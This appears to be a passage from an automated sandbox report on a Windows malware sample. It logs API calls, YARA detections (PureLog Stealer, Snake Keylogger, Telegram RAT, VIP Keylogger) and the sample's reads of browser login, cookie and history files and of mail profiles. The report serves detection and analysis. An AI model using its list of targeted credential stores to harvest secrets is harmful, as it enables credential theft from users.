Source: C:\Users\user\Desktop\image.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_02C95B84
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: GetLocaleInfoA,	3_2_00417A20
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: GetLocaleInfoA,	3_1_00417A20
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	4_2_02CA5A78
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: GetLocaleInfoA,	4_2_02CAA790
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	4_2_02CA5B83
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: GetLocaleInfoA,	7_2_00417A20
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: GetLocaleInfoA,	7_1_00417A20
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	9_2_02ED5A78
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: GetLocaleInfoA,	9_2_02EDA790
Source: C:\Users\Public\Libraries\Pumyophn.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	9_2_02ED5B83
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: GetLocaleInfoA,	14_2_00417A20
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: GetLocaleInfoA,	14_1_00417A20

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\image.exe

Code function: 0_2_02C9918C GetLocalTime,

0_2_02C9918C

Source: C:\Users\user\Desktop\image.exe

Code function: 0_2_02C9B70C GetVersionExA,

0_2_02C9B70C

Source: C:\Users\Public\Libraries\nhpoymuP.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 7688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 8008, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2966303963.0000000027C82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2964961500.0000000026094000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 7688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nhpoymuP.pif PID: 8008, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\nhpoymuP.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\Public\Libraries\nhpoymuP.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\nhpoymuP.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\nhpoymuP.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\nhpoymuP.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\Public\Libraries\nhpoymuP.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\Public\Libraries\nhpoymuP.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\nhpoymuP.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\Libraries\nhpoymuP.pif	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.31c30ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f3499de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.28470000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.nhpoymuP.pif.240bcc58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d2a8c6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.nhpoymuP.pif.27840ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.nhpoymuP.pif.25d299de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.nhpoymuP.pif.2d7ca218.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.nhpoymuP.pif.25817960.0.raw.unpack, type: UNPACKEDPE
